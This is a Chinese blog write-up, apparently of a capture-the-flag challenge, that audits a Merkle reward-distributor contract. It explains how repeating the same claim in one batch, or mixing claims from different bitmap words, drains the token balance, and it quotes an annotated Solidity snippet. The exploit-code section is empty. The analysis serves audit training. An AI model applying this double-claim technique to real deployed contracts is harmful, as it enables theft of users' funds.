<p>收到。作为 Web3 安全工程师，我将严格按照你的<strong>四步分析法</strong>（鸟瞰全貌 -&gt; 资金锚定 -&gt; 核心逻辑精读 -&gt; 威胁建模）重新对 <code>TheRewarderDistributor</code> 合约进行深度审计。</p>
<p>这是一个经典的<strong>由“过度 Gas 优化”引发的严重逻辑漏洞</strong>案例。</p>
<hr>
<h3>第一步：鸟瞰全貌 (Bird&#39;s Eye View)</h3>
<p><strong>1. 门面与定位 (Interface &amp; Role)</strong></p>
<ul>
<li><p><strong>角色</strong>：Merkle Distributor（默克尔分发器）。</p>
</li>
<li><p><strong>依赖库</strong>：</p>
<ul>
<li><p><code>Solady</code>: <code>FixedPointMathLib</code>, <code>SafeTransferLib</code> (以极致 Gas 优化著称，说明开发者非常在意 Gas)。</p>
</li>
<li><p><code>OpenZeppelin</code>: <code>MerkleProof</code> (标准验证), <code>BitMaps</code> (位图状态管理)。</p>
</li>
</ul>
</li>
<li><p><strong>关键特征</strong>：</p>
<ul>
<li><p>支持 <strong>多代币 (Multi-token)</strong> 分发。</p>
</li>
<li><p>支持 <strong>批量领取 (Batch Claiming)</strong>：这是最危险的信号。在 Solidity 中，手动实现的批量处理循环（Loop）往往是逻辑错误的温床。</p>
</li>
</ul>
</li>
</ul>
<p><strong>2. 找常量与配置 (Constants &amp; Config)</strong></p>
<ul>
<li><code>owner</code>: 不可变变量，权限控制较简单。</li>
<li>无明显离谱的硬编码费率或时间锁。</li>
</ul>
<hr>
<h3>第二步：资金锚定 (Asset Anchoring)</h3>
<p><strong>1. 资金流入 (Inflow)</strong></p>
<ul>
<li><code>createDistribution</code>: 调用 <code>SafeTransferLib.safeTransferFrom</code> 将代币从 <code>msg.sender</code> 拉入合约。此时更新 <code>remaining</code> 余额。这是资金的<strong>信任源头</strong>。</li>
</ul>
<p><strong>2. 资金流出 (Outflow) - 🚨 高危区域</strong></p>
<ul>
<li><p><code>claimRewards</code>: 这是攻击者盯着的地方。</p>
<ul>
<li><p>关键字：<code>inputTokens[...].transfer(msg.sender, ...)</code>。</p>
</li>
<li><p>逻辑：在循环结束后，或者切换代币时触发转账。</p>
</li>
</ul>
</li>
<li><p><code>clean</code>: <code>token.transfer(owner, ...)</code>。用于回收未分发的代币，风险相对较低（仅 Owner 可调）。</p>
</li>
</ul>
<p><strong>3. 状态与资金的挂钩</strong></p>
<ul>
<li><p><code>distributions[token].remaining</code>: 记录应付账款。</p>
</li>
<li><p><code>distributions[token].claims</code>: 记录谁领过了。</p>
</li>
<li><p><strong>核心矛盾</strong>：资金流出必须严格依赖 <code>claims</code> 的状态变更。如果状态变更（标记已领）滞后于或者不匹配资金流出计算，资金就会被盗。</p>
</li>
</ul>
<hr>
<h3>第三步：核心逻辑精读 (Core Logic Deep Dive)</h3>
<p>我们将显微镜对准 <code>claimRewards</code> 函数。开发者为了省 Gas，采用了一种 <strong>“延迟写入 + 累加器”</strong> 的模式。</p>
<p><strong>代码逻辑拆解：</strong></p>
<ol>
<li><p><strong>循环遍历</strong>：合约遍历用户提供的 <code>inputClaims</code> 数组。</p>
</li>
<li><p><strong>分组处理</strong>：它试图把针对同一个 Token 的多次领取合并成一次状态更新（SSTORE）和一次转账（CALL），以此节省 Gas。</p>
</li>
<li><p><strong>两个累加器</strong>：</p>
<ul>
<li><p><code>amount</code> (uint256): <strong>算术累加</strong>。 $Total = Claim_1 + Claim_2 + ...$</p>
</li>
<li><p><code>bitsSet</code> (uint256): <strong>位操作累加</strong>。 $Mask = Bit_1 | Bit_2 | ...$</p>
</li>
</ul>
</li>
</ol>
<p><strong>致命的逻辑不对称性：</strong></p>
<p>在循环内部处理同一个 Token 的连续 Claim 时：</p>
<ul>
<li><p><strong>金额计算</strong>：<code>amount += inputClaim.amount;</code></p>
<ul>
<li>如果你传入两次相同的 Claim（金额 100），结果是 $100 + 100 = 200$。</li>
</ul>
</li>
<li><p><strong>状态记录</strong>：<code>bitsSet = bitsSet | 1 &lt;&lt; bitPosition;</code></p>
<ul>
<li><p>如果你传入两次相同的 Claim（Batch Index 0），结果是 $(1 \ll 0) | (1 \ll 0) = 1$。</p>
</li>
<li><p><strong>注意</strong>：这里没有检查 <code>bitsSet</code> 中是否已经包含了该位！</p>
</li>
</ul>
</li>
</ul>
<p>检查点滞后：</p>
<p>_setClaimed 函数是唯一检查“是否已领取”并“写入状态”的地方。但它是在一组循环结束后才调用的，而且传入的是最终计算出的 bitsSet（值为 1）和 amount（值为 200）。</p>
<p>合约会去存储槽（Storage）里看：位置 0 的位是 1 吗？</p>
<ul>
<li><p>如果是第一次领，答案是 <strong>否</strong>。</p>
</li>
<li><p>检查通过。</p>
</li>
<li><p>合约写入位置 0 为 1。</p>
</li>
<li><p>合约转账 <strong>200</strong> 代币。</p>
</li>
<li><p><strong>结果</strong>：用户用一份凭证，领了两份钱。</p>
</li>
</ul>
<p>claimRewards函数中</p>
<pre><code class="language-solidity">//@audit-issue 奖励重复领取绕过（逻辑缺陷）
            if (token != inputTokens[inputClaim.tokenIndex]) {
                //@audit-issue token初始为0地址。
                //第一次进入循环时会跳过这里的逻辑，直到第二次进入循环时才会执行这里的逻辑，从而导致第一次领取记录无法被标记为已领取，从而可以重复领取奖励。
                if (address(token) != address(0)) {
                    if (!_setClaimed(token, amount, wordPosition, bitsSet)) revert AlreadyClaimed();
                }
</code></pre>
<p>所以我们只需要重复领取即可获得所有资金</p>
<hr>
<h3>第四步：威胁建模 (Threat Modeling)</h3>
<p><strong>1. 身份分离检查 (Auth Check)</strong></p>
<ul>
<li><p><code>msg.sender</code> 是领取者。</p>
</li>
<li><p><code>MerkleProof.verify</code> 验证了 <code>msg.sender</code> 有资格领取某笔钱。</p>
</li>
<li><p><strong>漏洞点</strong>：验证逻辑没有阻止 <code>msg.sender</code> 在<strong>同一个交易</strong>中多次使用同一个资格。</p>
</li>
</ul>
<p><strong>2. 攻击向量构建 (Attack Vector)</strong></p>
<p><strong>场景：重复索赔攻击 (The &quot;Double Dip&quot; Attack)</strong></p>
<ul>
<li><p><strong>前提</strong>：攻击者在 Batch 0 有 100 USDT 的奖励资格，且尚未领取。</p>
</li>
<li><p><strong>攻击载荷 (Payload)</strong>：</p>
<ul>
<li><p>构造一个 <code>Claim</code> 数组，包含 <strong>N</strong> 个完全相同的元素：</p>
<ul>
<li><p><code>batchNumber</code>: 0</p>
</li>
<li><p><code>amount</code>: 100</p>
</li>
<li><p><code>tokenIndex</code>: 0</p>
</li>
<li><p><code>proof</code>: [有效的 Merkle Proof]</p>
</li>
</ul>
</li>
</ul>
</li>
<li><p><strong>执行流程</strong>：</p>
<ol>
<li><p>循环第 1 次：<code>bitsSet</code> 变为 <code>...001</code>，<code>amount</code> 变为 100。</p>
</li>
<li><p>循环第 2 次：<code>bitsSet</code> 仍为 <code>...001</code> (OR 操作幂等)，<code>amount</code> 变为 200。</p>
</li>
<li><p>...</p>
</li>
<li><p>循环第 N 次：<code>bitsSet</code> 仍为 <code>...001</code>，<code>amount</code> 变为 $N \times 100$。</p>
</li>
<li><p>调用 <code>_setClaimed</code>：检查链上状态，Batch 0 未被标记。通过。</p>
</li>
<li><p>转账：发送 $N \times 100$ USDT。</p>
</li>
</ol>
</li>
<li><p><strong>后果</strong>：直接掏空该 Token 在合约内的所有余额（只要 $N \times 100 \le$ 合约余额）。</p>
</li>
</ul>
<p><strong>3. 另一个攻击向量：Word 覆盖攻击 (Word Overwrite)</strong></p>
<ul>
<li><p><strong>原理</strong>：<code>wordPosition</code> 变量在循环中被更新，但 <code>_setClaimed</code> 只使用循环结束时的那个 <code>wordPosition</code>。</p>
</li>
<li><p><strong>载荷</strong>：<code>[Claim(Batch 0), Claim(Batch 256)]</code>。</p>
<ul>
<li><p>Batch 0 对应 Word 0。</p>
</li>
<li><p>Batch 256 对应 Word 1。</p>
</li>
</ul>
</li>
<li><p><strong>结果</strong>：循环结束时 <code>wordPosition</code> 是 1。<code>bitsSet</code> 包含了 Batch 0 和 Batch 256 的位。合约会将这些位都写到 Word 1 中。</p>
<ul>
<li><strong>后果</strong>：Word 0（Batch 0 的真实位置）没有被写入。攻击者可以再次合法领取 Batch 0。</li>
</ul>
</li>
</ul>
<h2>wp</h2>
<pre><code class="language-solidity">
</code></pre>
</div> <nav class="article-nav" style="display: flex; justify-content: space-between; margin-top: 64px; padding-top: 32px; border-top: 1px solid var(--line);"> <div class="nav-prev" style="flex: 1;"> <a href="/posts/web3/合约审计/以太航员挑战/" style="text-decoration: none;"> <p class="muted" style="margin: 0; font-size: 0.9rem; color: var(--muted);">&larr; 上一篇</p> <h4 style="margin: 8px 0 0; color: var(--ink);">以太航员挑战</h4> </a> </div> <div class="nav-next" style="flex: 1; text-align: right;"> <a href="/posts/web3/开发框架/" style="text-decoration: none;"> <p class="muted" style="margin: 0; font-size: 0.9rem; color: var(--muted);">下一篇 &rarr;</p> <h4 style="margin: 8px 0 0; color: var(--ink);">开发框架</h4> </a> </div> </nav> </article>  </main> <script>
      (() => {
        const root = document.documentElement;
        const bindToggle = () => {
          const btn = document.getElementById("theme-toggle");
          if (!btn) return;
          const next = btn.cloneNode(true);
          btn.replaceWith(next);
          next.addEventListener("click", () => {
            const current = root.getAttribute("data-theme") === "dark" ? "dark" : "light";
            const value = current === "dark" ? "light" : "dark";
            root.setAttribute("data-theme", value);
            try { localStorage.setItem("theme", value); } catch {}
          });
        };
        bindToggle();
      })();
    </script> </body> </html> 